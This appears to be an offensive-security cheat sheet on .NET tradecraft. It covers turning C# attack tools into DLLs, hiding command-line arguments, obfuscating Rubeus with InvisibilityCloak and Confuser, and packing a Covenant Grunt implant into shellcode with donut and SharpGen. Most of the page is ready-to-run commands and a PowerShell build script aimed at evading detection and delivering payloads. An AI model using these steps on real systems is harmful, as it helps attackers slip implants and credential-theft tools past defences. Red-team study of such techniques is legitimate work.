.NET Assembly

Patch Environment.Exit

C# to Unmanaged DLL

Creating assembly with DLL exports from C# code:

  1. Select your favorite C# offensive tool.

  2. Install DllExport package via "Manage NuGet Packages for Solution" in VS.

  3. Configure DllExport like on the screenshot below and click "Apply".

  4. Agree to reload the solution.

  5. Edit the Main function code to work with no arguments passed so that the signature looks like static void Main().

  6. Add [DllExport] attribute before the Main function.

  7. Check "Allow unsafe code" and "Optimize code" boxes in Build tab of the solution.

  8. Build the solution as Release x64 DLL assembly.

  9. (Optional) Obfuscate the assembly with something like Confuser.

DllExport Configuration

The resulting DLL will be placed in .\bin\x64\Release\x64\ directory.

.NET Obfuscators

Hide command line by overwriting args to read values from a text file:

string line = File.ReadLines("cmd.txt").FirstOrDefault();
args = line.Split(' ');

Tools

Confusers

InvisibilityCloak

PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
PS > git clone https://github.com/GhostPack/Rubeus
PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
PS > cd Rubeus
PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
InvisibilityCloak.ps1
$repo = "GhostPack/Rubeus"

$cloak = "C:\Users\user\Desktop\Tools\InvisibilityCloak.py"
$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"

$target = $repo.Split('/')[1]
$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"

SharpSploit

SharpGen

Execution.ShellCode

$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
$ echo '");' >> shellcode.txt
$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40

Last updated